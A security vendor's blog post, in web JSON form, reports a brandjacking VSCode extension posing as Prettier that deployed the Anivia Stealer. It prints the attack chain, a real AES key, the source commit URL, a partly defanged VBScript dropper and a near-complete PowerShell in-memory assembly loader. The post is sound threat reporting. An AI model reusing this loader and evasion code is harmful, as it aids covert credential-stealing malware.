{"id":105794,"date":"2025-11-22T00:12:59","date_gmt":"2025-11-21T22:12:59","guid":{"rendered":"https:\/\/staging.checkmarx.com\/?post_type=zero-post&#038;p=105794"},"modified":"2026-02-27T20:40:16","modified_gmt":"2026-02-27T18:40:16","slug":"checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace","status":"publish","type":"zero-post","link":"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/","title":{"rendered":"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace"},"content":{"rendered":"<style type=\"text\/css\">@import url(\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/styles\/vs2015.min.css\");@font-face{font-family:'Hack';src:url('https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/hack-font\/3.3.0\/web\/fonts\/hack-regular-subset.woff2') format('woff2')}:root{--code-font:'Hack','Menlo','Consolas',monospace !important;--code-bg:#1e1e1e;--code-color:#0c1;--code-dim:#071;--text-color:#121185;--highlight-color:#f8ff91;--highlight-color-alt:#736ca0}article.content{max-width:100% !important;min-width:80% !important;width:99% !important}.wp-block-code code{text-wrap:nowrap !important}figure{margin-top:1.5rem;margin-bottom:1.5rem}p.caption,figcaption{font-size:1rem !important;font-style:italic !important;color:var(--code-dim) !important}p.caption *,figcaption *{font-size:inherit !important}div.callout{max-width:80% !important;padding-top:.5rem;padding-bottom:.5rem;margin-top:1rem;margin-bottom:1rem;display:block;margin-left:10%;border-top:.3rem solid #121185;border-bottom:.3rem solid #121185}div.callout p{font-size:x-large;text-align:left;font-weight:bold}.cxzero-video-include{display:block;max-width:1920px;width:100%;padding-top:1rem;padding-bottom:1rem}.cxzero-video-include video{display:block;padding:.5rem;background-color:var(--code-bg);width:98%;object-fit:cover}pre.wp-block-code,pre.highlighted-code,pre.sourceCode,pre{border:1px solid var(--code-color);width:90%;background-color:var(--code-bg);color:var(--code-color);margin:1em;padding:2em;overflow-x:scroll;font-family:var(--code-font);font-size:10.5pt;line-height:1.1em;text-wrap:nowrap !important;box-shadow:5px 5px 13px 0 var(--code-bg)}* kbd,* code,* tt{font-family:var(--code-font);padding-inline:.5em;color:var(--code-dim);font-size:85%}pre code{color:var(--code-color);font-size:90%}pre.highlighted-code span{font-family:var(--code-font);font-size:10.5pt;color:var(--code-color)}pre.highlighted-code span.comment{font-style:italic;color:var(--code-dim)}pre.highlighted-code span.keyword,pre.highlighted-code span.preproc{font-weight:bold;font-style:oblique}blockquote,blockquote *{font-size:1.375rem !important;font-style:italic !important}blockquote{border-left:.1rem solid;padding-left:1rem}mark,mark *{background-color:var(--highlight-color) !important}mark.ai-content,mark.ai-content *{background-color:var(--highlight-color-alt) !important;color:#fff !important}.cxzero-cve-block{border:1px solid var(--code-color,#0c1);padding:.5rem;p{padding:0;margin:0}span.vulndesc{display:block;font-size:.9rem;font-weight:400;font-style:italic}span.cvss::before{content:\"  \"}span.cvss{background:#fe0}span.cvss.critical{background:#c00;color:#eee}span.cvss.high{background:#ffac1c;color:#0015ff}span.vector::before{content:\"\u25b8\"}span.vector,span.vector *{overflow-wrap:break-word;font-family:var(--code-font);font-size:10pt}.kev{display:block;font-weight:bold}.kev::before{content:\"\u203c\ufe0f\"}}.print-source-info{display:none}@media print{.header,.header *,.article-nav,.article-nav *,.aticle-nav,.aticle-nav *,.section_latest,.section-latest *,footer,footer *,.section-menu-page,.section-menu-page *,.top-menu,.top-menu *,.top-menu__container,.top-menu__container *,.section-zero-article,.section-zero-article *{display:none}@page{margin:13mm !important}.section-aticle-header__image-or-video{max-width:125mm}.print-source-info{display:block;border-left:.2rem solid #000;font-style:italic !important;font-size:85%;padding-left:1rem}}<\/style> <script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/highlight.min.js\" integrity=\"sha512-EBLzUL8XLl+va\/zAsmXwS7Z2B1F9HUHkZwyS\/VKwh3S7T\/U0nF4BaU29EP\/ZSf6zgiIxYAnKLu6bJ8dqpmX5uw==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script> <script>hljs.highlightAll();<\/script> \n\n\n\n<p class=\"print-source-info\"><script>document.write(\"Copyright Checkmarx, all rights reserved. Retrieved \"+new Date().toLocaleDateString()+\" from<br\/>\"+window.location.href);<\/script><noscript>This document copyright Checkmarx, all rights reserved.<\/noscript><\/p>\n\n\n\n<!-- hilighters for powershell and vbscript --><script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/languages\/vbscript.min.js\" integrity=\"sha512-Mft7+XApE33mhIWXPqTxTv4zKnAMIImMMLtzD2QHGmTTMHMRc2W3OpEisZNtG5Av8NgNz\/EgEoJE9i6XKsqmSw==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script><script src=\"https:\/\/cdnjs.cloudflare.com\/ajax\/libs\/highlight.js\/11.11.1\/languages\/powershell.min.js\" integrity=\"sha512-J5RVPDNPGNQPjzhjtYPsrLHTX\/7GPhPU1AvmyCo\/hjKWBecwfX6ByD0oG\/NAS5VU3hwk8A\/DVVxjXm4ZEBJwhg==\" crossorigin=\"anonymous\" referrerpolicy=\"no-referrer\"><\/script>\n\n\n\n<p>Checkmarx Zero\u2019s <a href=\"https:\/\/checkmarx.com\/zero-post\/how-we-take-down-malicious-visual-studio-code-extensions\/\">ongoing monitoring of the Visual Studio Code Marketplace<\/a> has identified a critical Brandjacking style attack in the form of a malicious VSCode extension.<\/p>\n\n\n\n<p style=\"border: 0.1rem solid; padding: 0.5rem;\"><strong>Update 2025-12-05:<\/strong> additional brandjacking attacks that appear to be from this same campaign or adversary <a href=\"\/zero-post\/taking-down-more-malicious-vscode-extensions-in-the-prettier-campaign\/\">have also been identified and taken down<\/a>.\n\n\n\n<\/p>\n<p><strong>Name: <\/strong>`<code> prettier-vscode-plus<\/code>` (full identifier: `<code>publishingsofficial.prettier-vscode-plus<\/code>`)<br><strong>Publisher Account: <\/strong>publishingsofficial<br><strong>Release Date: <\/strong>2025-11-21 11:34:12 UTC<\/p>\n\n\n\n<p>We identified and reported this extension quickly, and it was removed within 4 hours after its publication, thanks to the efforts of <strong>Daniel Miranda<\/strong> and <strong>Raphael Silva<\/strong> on the Checkmarx Zero team and coordination with the VSCode Marketplace security team. We detected only 6 downloads and 3 installs before removal.<\/p>\n\n\n\n<p>This extension appears to be a fork of the <a href=\"https:\/\/marketplace.visualstudio.com\/items?itemName=esbenp.prettier-vscode\">legitimate \u201cPrettier\u201d extension<\/a> (identifier `<code>esbenp.prettier-vscode<\/code>`) with malicious behaviors added. The name, content, and overall style of the extension suggest the intention to use the recognition of the well-known \u201cPrettier\u201d brand to trick developers into installing this malicious alternative.<\/p>\n\n\n    <div class=\"section-zero-article light-theme\">\n        <div class=\"section-zero-article__wrapper\">\n            <div class=\"section-zero-article__nav-wrapper\">\n\t\t\t\t<div class=\"section-article-title\">Never miss critical research<\/div>\n                <button class=\"section-article-button\">Checkmarx Zero in your Inbox                    <img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/right_up_big.svg\" alt=\"right\">\n                <\/button>\n            <\/div>\n            <img decoding=\"async\" class=\"visual-image\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/visual-article.png\" alt=\"visual\">\n        <\/div>\n    <\/div>\n\t<!-- zero-subscribe-form-modal -->\n<div class=\"modal zero-subscribe-modal\" id=\"zero-subscribe-modal\">\n    <div class=\"modal__overlay modal__header-overlay\" tabindex=\"-1\">\n        <div class=\"modal__container\">\n            <header class=\"modal__header\" tabindex=\"2\">\n                <button class=\"modal__close-zero\" title=\"Close window\" aria-label=\"Close window\"><\/button>\n                <div class=\"section-subscribe\">\n                    <div class=\"section-subscribe__wrap-form\">\n                        <div class=\"section-subscribe__leftPart\">\n                            <div class=\"zero-modal-container\">\n                                <span class=\"zero-modal-container__title\">Never Miss Checkmarx <br> Zero Research Updates.<\/span>\n                                <span class=\"zero-modal-container__description\">Subscribe today!<\/span>\n                            <\/div>\n                            <img decoding=\"async\" class=\"zero-visual\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/cx_zero_subscribe_visual.webp\" alt=\"visual\">\n                        <\/div>\n                        <div class=\"section-subscribe__form hbsp-form form-with-multi-tags-select\">\n                            <script charset=\"utf-8\" type=\"text\/javascript\" src=\"\/\/js.hsforms.net\/forms\/embed\/v2.js\"><\/script>\n                            <script>\n                                hbspt.forms.create({\n                                    region: \"na1\",\n                                    portalId: \"146169\",\n                                    formId: \"fefb6730-994f-41bf-84ae-79460279a306\",\n                                    onFormReady: function ($form) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'none');\n\n\n                                    },\n                                    onFormSubmit: function ($form) {\n                                        document.querySelector('.zero-visual').style.display = 'none';\n                                        document.querySelector('.section-subscribe__leftPart').style.display = 'none';\n                                        document.querySelector('.form-description').style.display = 'none';\n                                        document.querySelector('.section-subscribe__form').style.margin = 0;\n                                        document.querySelector('.section-subscribe__form').style.padding = 0;\n                                        document.querySelector('.section-subscribe').style.minHeight = '132px';\n                                        document.querySelector('.section-subscribe__wrap-form').style.minHeight = '132px';\n                                        document.querySelector('.subscribe-zero-button__description-wrapper')\n                                            .classList\n                                            .add('subscribe-zero-button__description-hide');\n                                    }\n                                });\n                                document.addEventListener('change', (e) => {\n                                    if (e.target.closest('.hs-input')) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'block');\n                                    }\n\n                                })\n                            <\/script>\n                            <p class=\"form-description\">By submitting my information to Checkmarx, I hereby consent to the terms and conditions found in the <a href=\"\/legal\/privacy-policy\/\" target=\"_blank\">Checkmarx\u00a0Privacy\u00a0Policy<\/a> and to the processing of my personal data as described therein. By clicking submit above, you consent to allow Checkmarx to store and process the personal information submitted above to provide you the content requested.<\/p>\n                        <\/div>\n                    <\/div>\n                <\/div>\n            <\/header>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-1\">Malicious behavior in prettier-vscode-plus indicates skillful attack attempt<\/h2>\n\n\n\n<p>The payload system inserted into the malicious extension appears designed to evade common anti-malware and static scanning tactics. It\u2019s a multi-stage attack that ends with deploying and running what appears to be a variant of the Anivia Stealer malware; this malware acquires and exfiltrates credentials, metadata, and private information like WhatsApp chats from Windows machines.<\/p>\n\n\n\n<p>The basic deployment process follows this path:<\/p>\n\n\n\n<ol class=\"wp-block-list\">\n<li>Acquires payload data as a base64-encoded blob from a GitHub repository (see commit: https:\/\/github[.]com\/biwwwwwwwwwww\/vscode\/commit\/672525f0a8c826a69ca6a5961ad496cee29d9072.patch)<\/li>\n\n\n\n<li>Writes VBScript (VBS) code to the `<code>%TEMP%<\/code>` directory, executes it, and then removes it to avoid detection<\/li>\n\n\n\n<li>The VBS works as a \u201cbootstrap\u201d of sorts to execute PowerShell commands which decrypt the blob from step 1 into an executable binary in memory, using a static AES key (`<code>AniviaCryptKey2024!32ByteKey!HXX<\/code>`). Avoiding writing the binary to disk is likely an attempt to avoid triggering endpoint security system defenses.<\/li>\n\n\n\n<li>Executes the binary from memory by using the `<code>[Reflection.Assembly]::Load<\/code>` pathway, then calls the entry point `<code>Anivia.AniviaCRT<\/code>`; evidence that this is an Anivia Stealer deployment.<\/li>\n<\/ol>\n\n\n\n<p>This approach leaves very little evidence behind; a temporary presence of a file in a temporary directory is all the disk activity that the attack needs to establish itself on the system. It also uses evasive techniques like looking for evidence that it\u2019s running inside a detonation chamber or similar sandbox, such as checking whether the system has a small CPU count or a very small amount of available RAM.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">First-stage payload snippet<\/h3>\n\n\n\n<p>Relevant VBScript code from the first stage of the attack; we\u2019ve edited this script to render it inert, by removing actual payload content and the decryption\/decoding methods.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"language-vbscript\">Dim fso, shell, tempFile, stream, ps1Content\nSet fso = CreateObject(\"Scripting.FileSystemObject\")\nSet shell = CreateObject(\"WScript.Shell\")\ntempFile = fso.GetSpecialFolder(2) &amp; \"\\\" &amp; fso.GetTempName() &amp; \".ps1\"\nps1Content = \"PAYLOAD\"  : Rem removed content that decrypts and decodes real payload \nSet stream = fso.OpenTextFile(tempFile, 2, True)\nstream.Write ps1Content\nstream.Close\nshell.Run \"powershell.exe -ExecutionPolicy Bypass -NoProfile -File \"\"\" &amp; tempFile &amp; \"\"\"\", 0, False\nWScript.Sleep 5000\nOn Error Resume Next\nfso.DeleteFile tempFile<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">Second-stage payload snippet<\/h3>\n\n\n\n<p>This PowerShell script decrypts and loads the stealer malware binary without creating any new files on disk. We\u2019ve replaced specific names with STEALER for safety.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code class=\"language-powershell\">$key = &#91;System.Convert]::FromBase64String('KEY_HERE')\n$encrypted = &#91;System.Convert]::FromBase64String('PAYLOAD_HERE')\n\n# Decrypt AES\n$iv = New-Object byte&#91;] 16\n&#91;Array]::Copy($encrypted, 0, $iv, 0, 16)\n$ciphertext = New-Object byte&#91;] ($encrypted.Length - 16)\n&#91;Array]::Copy($encrypted, 16, $ciphertext, 0, $ciphertext.Length)\n\n$aes = &#91;System.Security.Cryptography.Aes]::Create()\n$aes.Key = $key\n$aes.IV = $iv\n$aes.Mode = &#91;System.Security.Cryptography.CipherMode]::CBC\n$aes.Padding = &#91;System.Security.Cryptography.PaddingMode]::PKCS7\n\n$decryptor = $aes.CreateDecryptor()\n$exeBytes = $decryptor.TransformFinalBlock($ciphertext, 0, $ciphertext.Length)\n$aes.Dispose()\n\n# Load assembly from bytes\n$assembly = &#91;System.Reflection.Assembly]::Load($exeBytes)\n\n# Find and invoke STEALER.Main() #SAFETY: adjusted name\n$type = $null\ntry {\n    $type = $assembly.GetType('STEALER', $true, $true)  #SAFETY: adjusted name\n} catch {\n    # Try to find type in all types\n    $allTypes = $assembly.GetTypes()\n    foreach ($t in $allTypes) {\n        if ($t.FullName -eq 'STEALER' -or $t.Name -eq 'STEALER') {  #SAFETY: adjusted name\n            $type = $t\n            break\n        }\n    }\n}\nif ($type -ne $null) {\n    $bindingFlags = &#91;System.Reflection.BindingFlags]::Public -bor &#91;System.Reflection.BindingFlags]::Static -bor &#91;System.Reflection.BindingFlags]::InvokeMethod\n    $method = $type.GetMethod('Main', $bindingFlags)\n    if ($method -eq $null) {\n        # Try with default binding flags\n        $method = $type.GetMethod('Main')\n    }\n    if ($method -ne $null) {\n        $method.Invoke($null, $null)\n    } else {\n        Write-Error 'Main method not found in AniviaCRT'\n    }\n} else {\n    Write-Error 'STEALER type not found. Available types:'  #SAFETY: adjusted name\n    $assembly.GetTypes() | ForEach-Object { Write-Host $_.FullName }\n}\n<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading article-anchor\" id=\"article-anchor-2\">How to respond to this malicious VSCode Extension<\/h2>\n\n\n\n<p>Checkmarx Zero\u2019s rapid identification coupled with Microsoft\u2019s rapid response means that the extension was removed before it could gain significant traction. However, the incident does highlight the need to ensure that your endpoint security controls are capable of detecting multi-stage attacks of this nature. An EDR tool capable of blocking the Anivia malware\u2019s behaviors, for example, likely limits the damage such a malicious package can cause.<\/p>\n\n\n\n<p>We continue to actively monitor the VSCode Marketplace for malicious extensions of this type, field our skilled security analysts to examine suspicious behaviors, and report discovered malware to the VSCode Marketplace. The Microsoft team responsible for Marketplace security continues to be responsive as well, leading to rapid removals of malicious extensions multiple times per week.<\/p>\n\n\n\n<p>However, threat actors can use pathways other than the Marketplace to distribute their malware; it\u2019s important to educate developers on the risks of installing extensions from outside the official marketplace. And depending on your organization\u2019s risk tolerance, it may be appropriate to use endpoint controls to block extension content that originates outside the VSCode Marketplace.<\/p>\n\n\n    <button class=\"subscribe-button\">\n\t\tSubscribe to Checkmarx Zero updates        <img decoding=\"async\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/right_up_big.svg\" alt=\"right\">\n    <\/button>\n\t<!-- zero-subscribe-form-modal -->\n<div class=\"modal zero-subscribe-modal\" id=\"zero-subscribe-modal\">\n    <div class=\"modal__overlay modal__header-overlay\" tabindex=\"-1\">\n        <div class=\"modal__container\">\n            <header class=\"modal__header\" tabindex=\"2\">\n                <button class=\"modal__close-zero\" title=\"Close window\" aria-label=\"Close window\"><\/button>\n                <div class=\"section-subscribe\">\n                    <div class=\"section-subscribe__wrap-form\">\n                        <div class=\"section-subscribe__leftPart\">\n                            <div class=\"zero-modal-container\">\n                                <span class=\"zero-modal-container__title\">Never Miss Checkmarx <br> Zero Research Updates.<\/span>\n                                <span class=\"zero-modal-container__description\">Subscribe today!<\/span>\n                            <\/div>\n                            <img decoding=\"async\" class=\"zero-visual\" src=\"https:\/\/checkmarx.com\/wp-content\/themes\/checkmarx\/assets\/images\/subscribe-zero\/cx_zero_subscribe_visual.webp\" alt=\"visual\">\n                        <\/div>\n                        <div class=\"section-subscribe__form hbsp-form form-with-multi-tags-select\">\n                            <script charset=\"utf-8\" type=\"text\/javascript\" src=\"\/\/js.hsforms.net\/forms\/embed\/v2.js\"><\/script>\n                            <script>\n                                hbspt.forms.create({\n                                    region: \"na1\",\n                                    portalId: \"146169\",\n                                    formId: \"fefb6730-994f-41bf-84ae-79460279a306\",\n                                    onFormReady: function ($form) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'none');\n\n\n                                    },\n                                    onFormSubmit: function ($form) {\n                                        document.querySelector('.zero-visual').style.display = 'none';\n                                        document.querySelector('.section-subscribe__leftPart').style.display = 'none';\n                                        document.querySelector('.form-description').style.display = 'none';\n                                        document.querySelector('.section-subscribe__form').style.margin = 0;\n                                        document.querySelector('.section-subscribe__form').style.padding = 0;\n                                        document.querySelector('.section-subscribe').style.minHeight = '132px';\n                                        document.querySelector('.section-subscribe__wrap-form').style.minHeight = '132px';\n                                        document.querySelector('.subscribe-zero-button__description-wrapper')\n                                            .classList\n                                            .add('subscribe-zero-button__description-hide');\n                                    }\n                                });\n                                document.addEventListener('change', (e) => {\n                                    if (e.target.closest('.hs-input')) {\n                                        [\n                                            ...document.querySelectorAll('.hs_firstname'),\n                                            ...document.querySelectorAll('.hs_lastname'),\n                                            ...document.querySelectorAll('.hs_company'),\n                                            ...document.querySelectorAll('.hs_jobtitle'),\n                                            ...document.querySelectorAll('.hs-dependent-field')\n                                        ].forEach(elem => elem.style.display = 'block');\n                                    }\n\n                                })\n                            <\/script>\n                            <p class=\"form-description\">By submitting my information to Checkmarx, I hereby consent to the terms and conditions found in the <a href=\"\/legal\/privacy-policy\/\" target=\"_blank\">Checkmarx\u00a0Privacy\u00a0Policy<\/a> and to the processing of my personal data as described therein. By clicking submit above, you consent to allow Checkmarx to store and process the personal information submitted above to provide you the content requested.<\/p>\n                        <\/div>\n                    <\/div>\n                <\/div>\n            <\/header>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<style type=\"text\/css\">.cxzero-social{margin-top:1em;padding-top:1em;border-top:1px solid #121086;border-bottom:1px solid #121086;padding-bottom:1em}.cxzero-social p{padding-top:.8em}.cxzero-social .cxzero-social-links{margin-left:.8em}.cxzero-social .social-link{margin-left:.6em}.cxzero-social .social-button{padding:.6em;margin:.2em .2em .2em .2em;white-space:nowrap}.cxzero-social .social-button svg,.cxzero-social .social-link svg{vertical-align:middle;height:1.3em}.cxzero-social .social-button a,.cxzero-social .social-link a{text-decoration:none !important}<\/style> <div class=\"cxzero-social\">\n<p> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/www.linkedin.com\/sharing\/share-offsite\/?url={url}\" onload=\"\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"LinkedIn Icon\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> Share on LinkedIn<\/a><\/span> <span class=\"social-button\"><a class=\"social-action\" href=\"https:\/\/bsky.app\/intent\/compose?text=I%20just%20read%20%22{title}%22%20from%20Checkmarx%20Zero%20{url}\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Bluesky Icon\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> Share on Bluesky<\/a><\/span> <\/p>\n<p class=\"cxzero-social-links\">Follow <a href=\"\/zero\/\">Checkmarx Zero<\/a>: <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/www.linkedin.com\/showcase\/checkmarx-zero\"><svg id=\"Layer_1\" data-name=\"Layer 1\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" alt=\"Checkmarx Zero on LinkedIn\" viewbox=\"0 0 122.88 122.31\"><defs><style>.cls-1{fill:#0a66c2}.cls-1,.cls-2{fill-rule:evenodd}.cls-2{fill:#fff}<\/style><\/defs><title>linkedin-app<\/title>\n<path class=\"cls-1\" d=\"M27.75,0H95.13a27.83,27.83,0,0,1,27.75,27.75V94.57a27.83,27.83,0,0,1-27.75,27.74H27.75A27.83,27.83,0,0,1,0,94.57V27.75A27.83,27.83,0,0,1,27.75,0Z\"><\/path><path class=\"cls-2\" d=\"M49.19,47.41H64.72v8h.22c2.17-3.88,7.45-8,15.34-8,16.39,0,19.42,10.2,19.42,23.47V98.94H83.51V74c0-5.71-.12-13.06-8.42-13.06s-9.72,6.21-9.72,12.65v25.4H49.19V47.41ZM40,31.79a8.42,8.42,0,1,1-8.42-8.42A8.43,8.43,0,0,1,40,31.79ZM23.18,47.41H40V98.94H23.18V47.41Z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-icon\" href=\"https:\/\/bsky.app\/profile\/checkmarxzero.bsky.social\"><svg xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" alt=\"Checkmarx Zero on Bluesky\" viewbox=\"0 0 511.999 452.266\"> <path fill=\"#0085FF\" fill-rule=\"nonzero\" d=\"M110.985 30.442c58.695 44.217 121.837 133.856 145.013 181.961 23.176-48.105 86.322-137.744 145.016-181.961 42.361-31.897 110.985-56.584 110.985 21.96 0 15.681-8.962 131.776-14.223 150.628-18.272 65.516-84.873 82.228-144.112 72.116 103.55 17.68 129.889 76.238 73 134.8-108.04 111.223-155.288-27.905-167.385-63.554-3.489-10.262-2.991-10.498-6.561 0-12.098 35.649-59.342 174.777-167.382 63.554-56.89-58.562-30.551-117.12 72.999-134.8-59.239 10.112-125.84-6.6-144.112-72.116C8.962 184.178 0 68.083 0 52.402c0-78.544 68.633-53.857 110.985-21.96z\"><\/path><\/svg> <\/a><\/span> <span class=\"social-link\"><a class=\"social-con\" href=\"https:\/\/x.com\/CheckmarxZero\"><svg alt=\"Checkmarx Zero on X\" xmlns=\"http:\/\/www.w3.org\/2000\/svg\" shape-rendering=\"geometricPrecision\" text-rendering=\"geometricPrecision\" image-rendering=\"optimizeQuality\" fill-rule=\"evenodd\" clip-rule=\"evenodd\" viewbox=\"0 0 512 462.799\"><path fill-rule=\"nonzero\" d=\"M403.229 0h78.506L310.219 196.04 512 462.799H354.002L230.261 301.007 88.669 462.799h-78.56l183.455-209.683L0 0h161.999l111.856 147.88L403.229 0zm-27.556 415.805h43.505L138.363 44.527h-46.68l283.99 371.278z\"><\/path><\/svg> <\/a><\/span> <\/p> <script>function social_action_template(a){const b=encodeURIComponent(window.location.href);const c=document.querySelector(\"h1\");let headContent=(c==null?\"\":c.textContent);let processed=a.replace(\/\\{title\\}\/g,encodeURIComponent(headContent));processed=processed.replace(\/\\{url\\}\/g,b);return processed}var socialAction=document.getElementsByClassName(\"social-action\");console.log(socialAction);for(e=0;e<socialAction.length;e++){element=socialAction.item(e);console.log(element);element.href=social_action_template(element.href)};<\/script> <\/div>\n\n\n\n<p><\/p>","protected":false},"excerpt":{"rendered":"<p>A malicious VSCode Extension posing as &#8220;Prettier Plus&#8221; (an apparent attempt to leverage Brandjacking of the legitimate and popular &#8220;Prettier&#8221;) has been taken down by Checkmarx Zero coordinating with Microsoft. Learn how it works, how it evades detection, and what you can do to stay safe.<\/p>\n","protected":false},"author":137,"featured_media":105795,"template":"","zero-category":[1067,1176,1333,1104],"zero-tag":[1069,1180,1070,1071,1450,1458],"class_list":["post-105794","zero-post","type-zero-post","status-publish","has-post-thumbnail","hentry","zero-category-blog","zero-category-security-blogs","zero-category-security-news","zero-category-technical-blog","zero-tag-appsec","zero-tag-malware","zero-tag-open-source-security","zero-tag-supply-chain-security","zero-tag-vscode","zero-tag-vscode-extension"],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx<\/title>\n<meta name=\"description\" content=\"Checkmarx Zero took down a malicious VSCode Extension posing as &quot;Prettier Plus&quot; (an apparent attempt to leverage Brandjacking of the legitimate and popular &quot;Prettier&quot;).\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Checkmarx Zero Takes Down Malicious \u201cPrettier\u201d Alternative Found In VSCode Marketplace - Checkmarx\" \/>\n<meta property=\"og:description\" content=\"Checkmarx Zero took down a malicious VSCode Extension posing as &quot;Prettier Plus&quot; (an apparent attempt to leverage Brandjacking of the legitimate and popular &quot;Prettier&quot;).\" \/>\n<meta property=\"og:url\" content=\"https:\/\/checkmarx.com\/zero-post\/checkmarx-zero-takes-down-malicious-prettier-alternative-found-in-vscode-marketplace\/\" \/>\n<meta property=\"og:site_name\" content=\"Checkmarx\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/Checkmarx.Source.Code.Analysis\" \/>\n<meta property=\"article:modified_time\" content=\"2026-02-27T18:40:16+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/checkmarx.com\/wp-content\/uploads\/2025\/11\/cxzero-feature_malicious-vscode-extension_prettier-plus.webp\" \/>\n\t<meta property=\"og:image:width\" content=\"2560\" \/>\n\t<meta property=\"og:image:height\" content=\"1280\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/webp\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@checkmarx\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"5 minutes\" \/>\n<script type=\"application\/ld+json\" 